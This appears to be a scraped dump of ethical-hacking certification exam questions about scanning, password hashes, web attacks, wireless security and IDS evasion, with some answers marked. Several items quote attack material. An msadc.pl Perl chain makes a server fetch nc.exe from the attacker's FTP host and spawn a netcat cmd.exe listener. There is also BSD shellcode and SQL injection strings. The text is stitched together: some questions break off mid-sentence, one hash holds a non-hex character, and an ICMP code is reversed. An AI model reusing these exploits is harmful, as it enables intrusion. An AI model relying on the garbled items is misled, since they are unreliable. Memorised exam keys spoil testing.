Nmap run completed -- 1 IP address (1 host up) scanned in 277.483 seconds

What would you do next to fingerprint the OS? (Select the Best Answer)

• Run an nmap scan with the -vv option
• Connect to the active services and review the banner information*
• Perform a Firewalk with that system as the target IP
• Perform a tcp traceroute to the system using port 53


Which of the following LM hashes represents a password of less than 8 characters? (Select all that apply)

• BA810DBA98995F1817306D272A9441BB
• 44EFCE164AB921CQAAD3B435B51404EE*
• 0182BD0BD4444BF836077A718CCDF409
• CEC52EB9C8E3455DC2265B23734E0DAC
• B757BF5C0D87772FAAD3B435B51404EE*
• E52CAC67419A9A224A3B108F3FA6CB6D

LM pads the password to 14 characters, splits it into two 7-character halves and DES-encrypts a fixed constant under each half; an empty half always produces AAD3B435B51404EE, so any hash whose second 16 hex digits are that constant came from a password of seven characters or fewer. (The "Q" in the second hash is not a hex digit, but the hash's second half is still the empty-half constant.)

You are scanning the target network for the first time. You are able to detect few conventional open ports. While attempting to perform conventional service identification by connecting to the open ports, the scan yields either bad or no results. As you are unsure of the protocols in use, you want to discover as many different protocols as possible. Which of the following scan options can help you achieve this?

(Select the Best Answer)

• Nessus scan with TCP based pings
• Nmap scan with the -sP (Ping scan) switch
• Netcat scan with the -u -e switches
• Nmap with the -sO (Raw IP packets) switch

 

1 172.16.1.254 (172.16.1.254) 0.724 ms 3.285 ms 0.613 ms
2 ip68-98-176-1.nv.nv.cox.net (68.98.176.1) 12.169 ms 14.958 ms 13.416 ms
3 ip68-98-176-1.nv.nv.cox.net (68.98.176.1) 13.948 ms ip68-100-0-1.nv.nv.cox.net (68.100.0.1) 16.743 ms 16.207 ms
4 ip68-100-0-137.nv.nv.cox.net (68.100.0.137) 17.324 ms 13.933 ms 20.938 ms
5 68.1.1.4 (68.1.1.4) 12.439 ms 220.166 ms 204.170 ms
6 so-6-0-0.gar2.wdc1.Level3.net (67.29.170.1) 16.177 ms 25.943 ms 14.104 ms
7 unknown.Level3.net (209.247.9.173) 14.227 ms 17.553 ms 15.415 ms
8 so-0-1-0.bbr1.NewYork1.level3.net (64.159.1.41) 17.063 ms 20.960 ms 19.512 ms
9 so-7-0-0.gar1.NewYork1.Level3.net (64.159.1.182) 20.334 ms 19.440 ms 17.938 ms
10 so-4-0-0.edge1.NewYork1.Level3.net (209.244.17.74) 27.526 ms 18.317 ms 21.202 ms
11 uunet-level3-oc48.NewYork1.Level3.net (209.244.160.12) 21.411 ms 19.133 ms 18.830 ms
12 0.so-6-0-0.XL1.NYC4.ALTER.NET (152.63.21.78) 21.203 ms 22.670 ms 20.111 ms
13 0.so-2-0-0.TL1.NYC8.ALTER.NET (152.63.0.153) 30.929 ms 24.858 ms 23.108 ms
14 0.so-4-1-0.TL1.ATL5.ALTER.NET (152.63.10.129) 37.894 ms 33.244 ms 33.910 ms
15 0.so-7-0-0.XL1.MIA4.ALTER.NET (152.63.86.189) 51.165 ms 49.935 ms 49.466 ms
16 0.so-3-0-0.XR1.MIA4.ALTER.NET (152.63.101.41) 50.937 ms 49.005 ms 51.055 ms
17 117.ATM6-0.GW5.MIA1.ALTER.NET (152.63.82.73) 51.897 ms 50.280 ms 53.647 ms
18 example-gw1.customer.alter.net (65.195.239.14) 51.921 ms 51.571 ms 56.855 ms
19 www.example.com (65.195.239.22) 52.191 ms 52.571 ms 56.855 ms
20 www.example.com (65.195.239.22) 53.561 ms 54.121 ms 58.333 ms

You perform the above traceroute and notice that hops 19 and 20 both show the same IP address. What does this most likely indicate?

(Select the Best Answer)

• An application proxying firewall
• A stateful inspection firewall
• A host based IDS
• A Honeypot

An employee wants to bypass detection by a network-based IDS application and does not want to attack the system containing the IDS application. Which of the following strategies can the employee use to evade detection by a network-based IDS application?

(Select the Best Answer)

• Create a network tunnel
• Create multiple false positives
• Create a SYN flood
• Create a ping flood

You are the Security Administrator of Xtrinity, Inc. You have discovered that an employee has attached a modem to his telephone line and workstation. He has used this modem to dial in to his workstation, thereby bypassing your firewall. A security breach has occurred as a direct result of this activity. The employee explains that he used the modem because he had to download software for a department project. How would you resolve this situation?

(Select the Best Answer)

• Reconfigure the firewall
• Conduct a needs analysis
• Install a network-based IDS
• Enforce the corporate security policy

John wants to try a new hacking tool on his Linux system. As the application comes from a site in his untrusted zone, John wants to ensure that the downloaded tool has not been Trojaned. Which of the following options would indicate the best course of action for John?

(Select the Best Answer)

• Obtain the application via SSL
• Obtain the application from a CD-ROM disc
• Compare the file's MD5 signature with the one published on the distribution media
• Compare the file's virus signature with the one published on the distribution media

Jack Hacker wants to break into Brown Co.'s computers and obtain their secret double fudge cookie recipe. Jack calls Jane, an accountant at Brown Co., pretending to be an administrator from Brown Co. Jack tells Jane that there has been a problem with some accounts and asks her to verify her password with him ''just to double check our records.'' Jane does not suspect anything amiss, and parts with her password. Jack can now access Brown Co.'s computers with a valid user name and password, to steal the cookie recipe. What kind of attack is being illustrated here?

(Select the Best Answer)

• Reverse Psychology
• Reverse Engineering
• Social Engineering
• Spoofing Identity
• Faking Identity


Bank of Timbuktu was a medium-sized, regional financial institution in Timbuktu. The bank had deployed a new Internet-accessible Web application recently, using which customers could access their account balances, transfer money between accounts, pay bills and conduct online financial business using a Web browser. John Stevens was in charge of information security at Bank of Timbuktu. After one month in production, several customers complained about the Internet enabled banking application. Strangely, the account balances of many of the bank's customers had been changed! However, money hadn't been removed from the bank. Instead, money was transferred between accounts. Given this attack profile, John Stevens reviewed the Web application's logs and found the following entries:

Attempted login of unknown user: johnm
Attempted login of unknown user: susaR
Attempted login of unknown user: sencat
Attempted login of unknown user: pete'';
Attempted login of unknown user: ' or 1=1--
Attempted login of unknown user: '; drop table logins--
Login of user jason, sessionID= 0x75627578626F6F6B
Login of user daniel, sessionID= 0x98627579539E13BE
Login of user rebecca, sessionID= 0x9062757944CCB811
Login of user mike, sessionID= 0x9062757935FB5C64
Transfer Funds user jason
Pay Bill user mike
Logout of user mike

What kind of attack did the Hacker attempt to carry out at the bank?

(Select the Best Answer)

• The Hacker attempted SQL Injection technique to gain access to a valid bank login ID.
• The Hacker attempted Session hijacking, in which the Hacker opened an account with the bank, then logged in to receive a session ID, guessed the next ID and took over Jason's session.
• Brute force attack in which the Hacker attempted guessing login ID and password from password cracking tools.
• The Hacker used a random generator module to pass results to the Web server and exploited Web application CGI vulnerability.

Joseph is the Web site administrator for the Mason Insurance in New York, whose primary website is located at www.masonins.com. Joseph uses his laptop computer regularly for website administration. One night, Joseph was notified by his associate that the main Mason Insurance web site had been vandalized! In place of the legitimate content, the hacker had left a message ''Hacker Message: You are dead! Freaks!''

Joseph surfed to the Web site from his office, which was directly connected to Mason Insurance's internal network using his laptop. However, no changes were apparent to him and he could see the legitimate content. Joseph was puzzled when another employee called in to report the defaced website. Joseph decided to access the Web site using his dial-up ISP connection, again using his laptop. He browsed to www.masonins.com to see the following web page:

H@cker Mess@ge: Y0u @re De@d! Fre@ks!

After seeing the defaced Web site, he disconnected his dial-up line, reconnected to the internal network, and used Secure Shell (SSH) to log in directly to the Web server. He ran Tripwire against the entire Web site, and found that every system file and all the Web content on the server were intact. How did the attacker accomplish this hack?

(Select the Best Answer)

• DNS poisoning
• ARP spoofing
• SQL injection
• Routing table injection

Bob is acknowledged as a hacker of repute and is popular among visitors of 'underground' sites. Bob is willing to share his knowledge with those who are willing to learn, and many have expressed their interest in learning from him. However, this knowledge has a risk associated with it, as it can be used for malevolent attacks as well. In this context, what would be the most effective method to bridge the knowledge gap between the "black" hats or crackers and the "white" hats or computer security professionals?

(Select the Best Answer)

• Educate everyone with books, articles and training on risk analysis, vulnerabilities and safeguards
• Hire more computer security monitoring personnel to monitor computer systems and networks
• Make obtaining either a computer security certification or accreditation easier to achieve so more individuals feel that they are a part of something larger than life
• Train more national guard and reservists in the art of computer security to help out in times of emergency or crises

While doing a penetration test, you discover that the organization is using one domain for web publishing and another domain for administration along with business operations. During what phase of the penetration test would you normally discover this?

(Select the Best Answer)

• Port Scanning
• Passive Information Gathering
• Active Attack
• Vulnerability Mapping

You are performing a port scan on a subnet that has the ICMP protocol blocked. You discover 23 live systems and after doing a port scan on each one of them, you notice that they all show port 21 in closed state. What would be the next logical step that you would perform?

(Select the Best Answer)

• Connect to open ports to discover applications
• Perform a ping sweep to identify any additional systems that might be up
• Perform a SYN scan on port 21 to identify any additional systems that might be up
• Rescan every computer to verify the results

While probing an organization you discover that they have a wireless network. From your attempts to connect to the WLAN you determine that they are using MAC filtering by using ACL's on the access points. What would be the easiest way to circumvent this and communicate on the WLAN?

(Select the Best Answer)

• Attempt to crack the WEP key using Airsnort
• Attempt to brute force the access point and update or delete the MAC ACL's
• Steal a client computer and use it to access the wireless network
• Sniff traffic off the WLAN and spoof your MAC address to the one that you have captured

While scanning a network you observe that all of the web servers in the DMZ are responding to ACK packets on port 80. What can you infer from this observation?

(Select the Best Answer)

• They are using Windows based web servers
• They are using UNIX based web servers
• They are not using an Intrusion Detection System
• They are not using a stateful inspection firewall

You are conducting an IdleScan manually using Hping2. During the scanning process, you notice that almost every query increments the IPID, regardless of the port being queried. One or two of the queries cause the IPID to increment by more than one value. Which of the following options would be a possible reason?

(Select the Best Answer)

• The zombie you are using is not truly idle
• A stateful inspection firewall is resetting your queries
• Hping2 cannot be used for idlescanning
• These ports are actually open on the target system

You have successfully run a buffer overflow attack against a default IIS installation running on a Windows 2000 server. The server allows you to spawn a shell. In order to perform the actions you intend to do, you need elevated permission. You need to know what your privileges are within the shell. Which of the following options would be your current privileges?

(Select the Best Answer)

• Administrator
• IUSR_COMPUTERNAME
• LocalSystem
• IIS default installation account

Starting nmap V. 3.10ALPHA9 ( www.insecure.org/nmap/ )
Interesting ports on 192.168.1.1:
(The 1592 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
25/tcp open smtp
80/tcp open http
443/tcp open https
Remote operating system guess: Too many signatures match to reliably guess the OS.
Nmap run completed -- 1 IP address (1 host up) scanned in 91.66 seconds

What can you conclude from the above nmap results?

(Select the Best Answer)

• The system is a Windows Domain Controller
• The system is not firewall enabled
• The system is not running Linux or Solaris
• The system is not properly patched

You have retrieved the raw hash values from a Windows 2000 Domain Controller. Using social engineering, you come to know that they are enforcing strong passwords. You understand that all users are required to use passwords that are at least 8 characters in length. All passwords must also use 3 of the 4 following categories: lower case letters, capital letters, numbers and special characters.

With your given knowledge of users, likely user account names and the possibility that they will choose the easiest passwords possible, what would be the fastest type of password cracking attack you can run against these hash values and still get results?

(Select the Best Answer)

• Encryption Attack
• Dictionary Attack
• Brute Force Attack
• Hybrid Attack

You are having trouble obtaining accurate results while conducting a port scan against a target network. You check for the presence of any security devices between you and the target system. When both stealth and connect scans do not work, you decide to perform a NULL scan with NMAP. The first few systems scanned show all ports open. Which one of the following statements is most probably true?

(Select the Best Answer)

• The systems have all ports open
• The systems are running a host based IDS
• The systems are Web Servers
• The systems are running Windows

The programmers on your team are analyzing the free, open source software being used to run FTP services on a server in your organization. They notice that there is an excessive number of functions in the source code that might lead to buffer overflow. These C++ functions do not check bounds. Identify the line in the source code that might lead to buffer overflow.

    #include <stdio.h>
    #include <stdlib.h>   /* exit() */
    #include <string.h>   /* strlen() */

    void stripnl(char *str) {
        while(strlen(str) && ( (str[strlen(str) - 1] == 13) || ( str[strlen(str) - 1] == 10 ))) {
            str[strlen(str) - 1] = 0;
        }
    }

    int main() {
        FILE *infile;
        char fname[40];
        char line[100];
        int lcount = 0;
        /* Read in the filename */
        printf("Enter the name of a ascii file: ");
        fgets(fname, sizeof(fname), stdin);
        /* We need to get rid of the newline char. */
        stripnl(fname);
        /* Open the file. If NULL is returned there was an error */
        if((infile = fopen(fname, "r")) == NULL) {
            printf("Error Opening File.\n");
            exit(1);
        }
        while( fgets(line, sizeof(line), infile) != NULL ) {
            /* Get each line from the infile */
            lcount++;
            /* print the line number and data */
            printf("Line %d: %s", lcount, line);
        }
        fclose(infile); /* Close the file */
        return 0;
    }

(Select the Best Answer)

9
20
17
32
35

A client has approached you with a penetration test requirement. They are concerned with the possibility of external threat, and have invested considerable resources in protecting their Internet exposure. However, their main concern is the possibility of an employee elevating his/her privileges and gaining access to information outside of their department. What kind of penetration test would you recommend that would best address the client's concern?

(Select the Best Answer)

A Black Box test
A Black Hat test
A Grey Box test
A Grey Hat test
A White Box test
A White Hat test

You have been using the msadc.pl attack script to execute arbitrary commands on an NT4 web server. While it is effective, you find it tedious to perform extended functions. On further research you come across a perl script that runs the following msadc functions:

    system("perl msadc.pl -h $host -C \"echo open $your >sasfile\"");
    system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
    system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\"");
    system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");
    system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\"");
    system("perl msadc.pl -h $host -C \"echo get hacked.html>>sasfile\"");
    system("perl msadc.pl -h $host -C \"echo quit>>sasfile\"");
    system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");
    $o=<STDIN>; print "Opening ...\n";
    system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");

What kind of exploit is indicated by this script?

(Select the Best Answer)

A buffer overflow exploit
A SUID exploit
A SQL injection exploit
A chained exploit
A buffer under run exploit

What is the expected result of the following exploit?

    ################################################################
    #
    $port = 53; # Spawn cmd.exe on port X
    $your = "192.168.1.1"; # Your FTP Server
    $user = "Anonymous"; # login as
    $pass = '[email protected]'; # password
    ################################################################
    $host = $ARGV[0];
    print "Starting ...\n";
    print "Server will download the file nc.exe from $your FTP server.\n";
    system("perl msadc.pl -h $host -C \"echo open $your >sasfile\"");
    system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
    system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\"");
    system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");
    system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\"");
    system("perl msadc.pl -h $host -C \"echo get hacked.html>>sasfile\"");
    system("perl msadc.pl -h $host -C \"echo quit>>sasfile\"");
    print "Server is downloading ...\n";
    system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");
    print "Press ENTER when download is finished ... (That's why it's good to have your own ftp server)\n";
    $o=<STDIN>; print "Opening ...\n";
    system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");
    print "Done.\n";
    #system("telnet $host $port"); exit(0);

(Select the Best Answer)

Opens up a telnet listener that requires no username or password
Creates an FTP server with write permissions enabled
Creates a share called ''sasfile'' on the target system
Creates an account with a username of Anonymous and a password of [email protected]


within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2193; rev:1;)

From the options below, choose the exploit against which this rule applies?

(Select the Best Answer)

WebDav
SQL Slammer
MS Blaster
IIS Unicode

A user on your Windows 2000 network has discovered that he can use L0phtcrack to sniff the SMB exchanges which carry user logons. The user is plugged into a hub with 23 other systems. However, he is unable to capture any logons though he knows that other users are logging on. What do you think is the most likely reason behind this?

(Select the Best Answer)

There is a NIDS present on that segment
Kerberos is preventing it
Windows logons cannot be sniffed
L0phtcrack only sniffs logons to web servers

While performing a ping sweep of a subnet you receive an ICMP reply of Code 3/Type 13 for all the pings you have sent out. What is the most likely cause behind this?

(Select the Best Answer)

The firewall is dropping the packets
An in-line IDS is dropping the packets
A router is blocking ICMP
The host does not respond to ICMP packets

You are performing a port scan with nmap. You are in a hurry and conducting the scans at the fastest possible speed. However, you don't want to sacrifice reliability for speed. If stealth is not an issue, what kind of scan would you run and yet get very reliable results?

(Select the Best Answer)

Stealth scan
XMAS scan
Fragmented packet scan
Connect scan

A file integrity program such as Tripwire protects against Trojan horse attacks by:

(Select the Best Answer)

• automatically deleting Trojan horse programs
• helping you catch unexpected changes to a system utility file that might indicate it had been replaced by a Trojan horse
• rejecting packets generated by Trojan horse programs
• using programming hooks to inform the kernel of Trojan horse behaviour

You want to carry out session hijacking on a remote server. The server and the client are communicating via TCP after a successful TCP three way handshake. The server has just received packet #120 from the client. The client has a receive window of 200 and the server has a receive window of 250. Within what range of sequence numbers should a packet sent by the client fall in order to be accepted by the server?

(Select the Best Answer)

200-250
121-371 *
120-321
121-231
120-370

While reviewing the results of a scan run against a target network you come across the following:

system.sysDescr.0 : DISPLAY STRING- (ascii): Cisco Internetwork Operating System Software
IOS (tm) 4500 Software (C4500-IS-M), Version 12.0(9), RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2000 by cisco Systems, Inc.
Compiled Tue 25-Jan-00 04:28 by bettyl
system.sysObjectID.0 : OBJECT IDENTIFIER: .iso.org.dod.internet.private.enterprises.cisco.catProd.cisco4700
system.sysUpTime.0 : Timeticks: (156398017) 18 days, 2:26:20.17
system.sysContact.0 : DISPLAY STRING- (ascii):
system.sysName.0 : DISPLAY STRING- (ascii): somerroutername
system.sysLocation.0 : DISPLAY STRING- (ascii):
system.sysServices.0 : INTEGER: 6
system.sysORLastChange.0 : Timeticks: (0) 0:00:00.00

What was used to obtain this output?

(Select the Best Answer)

A Bo2k system query
nmap protocol/port scan
Hping2 diagnosis
An SNMP walk

While performing ping scans into a target network you get a frantic call from the organization's security team. They report that they are under a denial of service attack. When you stop your scan, the smurf attack event stops showing up on the organization's IDS monitors. How can you modify your scan to prevent triggering this event in the IDS?

(Select the Best Answer)

Scan more slowly
Do not scan the broadcast IP
Spoof the source IP address
Only scan the Windows systems

Using PKI, when Alice wishes to send a secret message to Bob, she looks up Bob's public key in a directory, uses it to encrypt the message and sends it off. Bob then uses his private key to decrypt the message and read it. No one listening in can decrypt the message. Anyone can send an encrypted message to Bob but only Bob can read it. Thus, although many people may know the public key of Bob and use it to verify Bob's signatures, they cannot discover Bob's private key and use it to forge digital signatures. This is referred to as the principle of:

(Select the Best Answer)

Irreversibility
Non-repudiation
Symmetry
Asymmetry

You are gathering competitive intelligence on an organization. You notice that they have jobs listed on a few Internet job-hunting sites. There are two jobs for network and system administrators. How can this help you in footprinting the organization?

(Select the Best Answer)

The IP range used by the target network
An understanding of the number of employees in the company
How strong the corporate security policy is
The types of operating systems and applications being used

Bob waits near a secured door, holding a box. He waits until an employee walks up to the secured door and uses the special card in order to access the restricted area of the target company. Just as the employee opens the door, Bob walks up to the employee (still holding the box) and asks the employee to hold the door open so that he can enter. What is the best way to undermine the social engineering activity of tailgating?

(Select the Best Answer)

• issue special cards to access secured doors at the company and provide a one-time only brief description of use of the special card
• to post a sign that states ''no tailgating'' next to the special card reader adjacent to the secured door
• setup a mock video camera next to the special card reader adjacent to the secured door
• to educate all of the employees of the company on best security practices on a recurring basis

In order to attack a wireless network, you put up an access point and override the signal of the real access point. As users send authentication data, you are able to capture it. What kind of attack is this?

(Select the Best Answer)

Rogue access point attack
Unauthorized access point attack
Drive by hacking
WEP attack

Bob has a good understanding of cryptography, having worked with it for many years. Cryptography is used to secure data from specific threats, but it does not secure the application from coding errors. It can provide data privacy, integrity and enable strong authentication but it cannot mitigate programming errors. What is a good


Unfortunately unauthorized users are still able to connect to the wireless network. Why do you think this is possible?

(Select the Best Answer)

Bob forgot to turn off DHCP
All access points are shipped with a default SSID
The SSID is still sent inside both client and AP packets
Bob's solution only works in ad-hoc mode

In an attempt to secure his wireless network, Bob implements a VPN to cover the wireless communications he is using in his office. Soon after the implementation, users begin complaining about the wireless network slowing down. After benchmarking the network's speed, Bob discovers that throughput has dropped by almost half, even though the number of users has remained the same. What do you think is the reason behind this?

(Select the Best Answer)

The stronger encryption used by the VPN slows down the network
Using a VPN with wireless doubles the overhead on an access point for all direct client to access point communications
VPNs use larger packets than wireless networks normally do
Using a VPN on wireless automatically enables WEP, which causes additional overhead

In an attempt to secure his 802.11b wireless network, Bob decides to use strategic antenna positioning. He places the antennas for the access points near the center of the building. For those access points near the outer edge of the building he uses semi-directional antennas that face towards the building's center. There is a large parking lot and outlying field surrounding the building that extends out half a mile around the building. Bob figures that with this and his placement of antennas, his wireless network will be safe from attack. Which of the following statements is true?

(Select all that apply)

• With the 300 foot limit of a wireless signal, Bob's network is safe
• Wireless signals can be detected from miles away; Bob's network is not safe
• Bob's network will be safe but only if he doesn't switch to 802.11a
• Bob's network will not be safe until he also enables WEP

Bob reads an article about how insecure wireless networks can be. He gets approval from his management to implement a policy of not allowing any wireless devices on the network. What other steps does Bob need to take to successfully implement this?

(Select all that apply)

Train users in the new policy
Disable all wireless protocols at the firewall
Disable SNMP on the network so wireless devices cannot be configured
Continuously survey the area for wireless devices
Purchase a device that jams wireless signals

You wish to determine the operating system and type of web server being used. At the same time you wish to arouse no suspicion within the target organization. While some of the methods listed below will work, which holds the least risk of detection?

(Select the Best Answer)

Make some phone calls and attempt to retrieve the information using social engineering
Use nmap in paranoid mode and scan the web server
Telnet to the web server and issue commands to elicit a response
Use the netcraft web site to look for the target organization's web application

An attacker has been successfully modifying the purchase price of items purchased at a web site. The security administrators verify the web server and Oracle database have not been compromised directly. They have also verified the IDS logs and found no attacks that could have caused this. What is the most likely way the attacker has been able to modify the price?

(Select the Best Answer)

By changing hidden form values in a local copy of the web page
By using cross site scripting
By using SQL injection
There is no way the attacker could do this without directly compromising either the web server or the database

You are the security administrator for a large network. You want to prevent attackers from running any sort of traceroute into your DMZ and discovering the internal structure of publicly accessible areas of the network. How can you achieve this?

(Select the Best Answer)

Block ICMP at the firewall
Block UDP at the firewall
Both A and B above
There is no way to completely block tracerouting into this area

You are attempting to map out the firewall policy for an organization. You discover your target system is one hop beyond the firewall. Using hping2, you send SYN packets with the exact TTL of the target system starting at port 1 and going up to port 1024. What is this process known as?

(Select the Best Answer)

Footprinting
Firewalking
Enumeration
Idle scanning

Jim's organization just completed a major Linux roll out and now all of the organization's systems are running the Linux 2.5 kernel. The roll out expenses have posed constraints on purchasing other essential security equipment and software. The organization requires an option to control network traffic and also perform stateful inspection of traffic going into and out of the DMZ. Which built-in functionality of Linux can achieve this?

(Select the Best Answer)

IP Tables
IP Chains
IP Sniffer
IP ICMP

Jim was having no luck performing a penetration test on his company's network. He was running the test from home and had downloaded every security scanner he could lay his hands on. Despite knowing the IP range of all of the systems, and the exact network configuration, Jim was unable to get any useful results. Why is Jim having these problems? (Select the Best Answer)

Security scanners are not designed to do testing through a firewall
Security scanners cannot perform vulnerability linkage
Security scanners are only as smart as their database and cannot find unpublished vulnerabilities
All of the above

 

An attacker is attempting to telnet into a corporation's system in the DMZ. The attacker doesn't want to get caught and is spoofing his IP address. After numerous tries he remains unsuccessful in connecting to the system. The attacker rechecks that the target system is actually listening on port 23 and verifies it with both nmap and hping2. He is still unable to connect to the target system. What could be the reason? (Select the Best Answer)

The firewall is blocking port 23 to that system
He cannot spoof his IP and successfully use TCP
He needs to use an automated tool to telnet in
He is attacking an operating system that does not reply to telnet even when open

Bill has successfully executed a buffer overflow against a Windows IIS web server. He has been able to spawn an interactive shell and plans to deface the main web page. He first attempts to use the ''Echo'' command to simply overwrite index.html and remains unsuccessful. He then attempts to delete the page and achieves no progress. Finally, he tries to overwrite it with another page, in which he also remains unsuccessful. What is the probable cause of Bill's problem? (Select the Best Answer)

The system is a honeypot
There is a problem with the shell and he needs to run the attack again
You cannot use a buffer overflow to deface a web page
The HTML file has permissions of read only

 

While investigating a claim of a user downloading illegal material, the investigator goes through the files on the suspect's workstation. He comes across a file that is just called ''file.txt'' but when he opens it, he finds the following:

#define MAKE_STR_FROM_RET(x) ((x)&0xff),(((x)&0xff00)<<8),(((x)&0xff0000)<<16),(((x)&0xff000000)<<24)
char infin_loop[]= /* for testing purposes */
"\xEB\xFE";
char bsdcode[] = /* Lam3rZ chroot() code by venglin */
"\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43"
"\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0"
"\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb0"
"\x88\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80"
"\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9"
"\x31\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75"
"\xf1\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd"
"\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46"
"\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56"
"\x0c\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53"
"\x53\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\x01\xff\xff\x30"
"\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e"
"\x67\x6c\x69\x6e";
static int magic[MAX_MAGIC],magic_d[MAX_MAGIC];
static char *magic_str=NULL;
int before_len=0;

What can he infer from this file? (Select the Best Answer)

A picture that has been renamed with a .txt extension
An encrypted file
A uuencoded file
A buffer overflow

 

During the scanning portion of his penetration test, Ed discovered a handful of Oracle servers. Later, Ed found that those Oracle servers were being used by the web servers to retrieve information. Ed decided that he should try some SQL injection attacks in order to read information out of the Oracle servers. He opens the web page in his browser and begins injecting commands. After hours of attempts, Ed is having no luck getting even a small amount of information out of the databases. What is the probable cause of this? (Select the Best Answer)

You cannot do SQL injection against Oracle database
You must directly connect to the database instead of using the web server
You cannot use a web browser to perform SQL injection
Ed is not using SQL Plus to inject commands

 

Fingerprinting an Operating System helps a cracker because: (Select the Best Answer)

It defines exactly what software you have installed
It opens a security-delayed window based on the port being scanned
It informs the cracker of which vulnerabilities he may be able to exploit on your system
It doesn't depend on the patches that have been applied to fix existing security holes

 

A program that defends against a port scanner will attempt to: (Select the Best Answer)

Update a firewall rule in real time to prevent the port scan from being completed
Send back bogus data to the port scanner
Limit access by the scanning system to publicly available ports only
Log a violation and recommend use of security-auditing tools

 

A distributed port scan operates by: (Select the Best Answer)

using denial-of-service software against a range of TCP ports
having multiple computers each scan a small number of ports, then correlating the results
blocking access to the targeted host by each of the distributed scanning clients
blocking access to the scanning clients by the targeted host

An nmap command that includes the host specification of 202.176.56-57.* will scan _______ number of hosts. (Select the Best Answer)

512
2256
Over 10,000

You are concerned that someone running PortSentry could block your scans,


IDS without notice because they are inside legal HTTP requests. Bret is determined to weed out any vulnerabilities. What are some common vulnerabilities in web applications that he should be concerned about? (Select the Best Answer)

Un-validated parameters, broken access control, broken account and session management, cross-site scripting and buffer overflows are just a few common vulnerabilities
Visible clear text passwords, anonymous user account set as default, missing latest security patch, no firewall filters set and no SSL configured are just a few common vulnerabilities
No SSL configured, anonymous user account set as default, missing latest security patch, no firewall filters set and an inattentive system administrator are just a few common vulnerabilities
No IDS configured, anonymous user account set as default, missing latest security patch, no firewall filters set and visible clear text passwords are just a few common vulnerabilities

Jimmy, an attacker, knows that he can take advantage of poorly designed input validation routines to create or alter SQL commands to gain access to unintended data or execute commands in the database. What technique does this describe that Jimmy is willing to use to compromise a database? (Select the Best Answer)

Jimmy can submit user input that executes an operating system command to compromise a target system
Jimmy can utilize this particular database threat, which is a SQL injection technique, to penetrate a target system
Jimmy can gain control of a system to flood the target system with requests, preventing legitimate users from gaining access
Jimmy can utilize an incorrect configuration that leads to access with higher-than-expected privilege of the database

June, a security analyst, understands that a polymorphic virus has the ability to mutate and can change its known viral signature and hide from signature-based antivirus programs. How can June use an antivirus program in this case, and would it be effective against a polymorphic virus? (Select the Best Answer)

Yes. June can use an antivirus program since it compares the parity bit of executable files to the database of known checksum counts and it is effective on a polymorphic virus
Yes. June can use an antivirus program since it compares the signatures of executable files to the database of known viral signatures and it is very effective against a polymorphic virus
No. June can't use an antivirus program since it compares the signatures of executable files to the database of known viral signatures, and in this case the polymorphic viruses cannot be detected by a signature-based anti-virus program
No. June can't use an antivirus program since it compares the size of executable files to the database of known viral signatures and it is effective on a polymorphic virus

Rebecca is a security analyst and is aware of a well known local root exploit that has the ability of enabling local users to use available exploits to gain root privileges. This vulnerability exploits a condition in the Linux kernel within the execve() system call. There is no known workaround that exists for this vulnerability. What is the correct action to be taken by Rebecca in this situation as a recommendation to management? (Select the Best Answer)

Rebecca should make a recommendation to disable the execve() system call
Rebecca should make a recommendation to upgrade the Linux kernel promptly
Rebecca should make a recommendation to set all child-processes to sleep within the execve()
Rebecca should make a recommendation to hire more system administrators to monitor all child processes to ensure that each child process can't elevate privilege

Statistics from cert.org and other leading security organizations have clearly shown a steady increase in the number of hacking incidents against companies. What do you think is the main reason we have seen such a huge increase in hacking attempts over the past years? (Select the Best Answer)

it is getting harder to hack and more challenging for non technical people
increase in processing power
new TCP/IP stack features are constantly being added
the ease of getting hacker tools on the Internet


What does the term ''Ethical Hacking'' mean? (Select the Best Answer)

Someone who is hacking for ethics reasons
Someone who is using their skills for ethics reasons
Someone who is using their skills for defensive purposes
Someone who is using their skills for offensive purposes

What is the key difference between an 'Ethical Hacker' and a 'Cracker'? (Select the Best Answer)

The ethical hacker does not use the same techniques or skills
The ethical hacker does it strictly for financial motives
The ethical hacker has authorization from the owner of the target
The ethical hacker is just a cracker that is getting paid

Ethical Hacking and Countermeasures v3

 

Which of the following best describes Vulnerability? (Select the Best Answer)

A weakness or error that can lead to a compromise
An agent that could take advantage of a weakness
An action or event that might prejudice security
The loss potential of a threat

When a malicious hacker identifies a target and wants to eventually compromise this target, what would be the first step the attacker would perform? (Select the Best Answer)

Cover his tracks by eradicating the log files
Gain access to the remote computer for identification of venue of attacks
Perform a reconnaissance of the remote target for identification of venue of attacks
Always start with a scan in order to quickly identify venue of attacks

 

What does the term 'Hacktivism' mean? (Select the Best Answer)

Someone that has an urge to constantly hack
Someone who is hacking for a cause
Someone who has at least 12 years of hacking experience
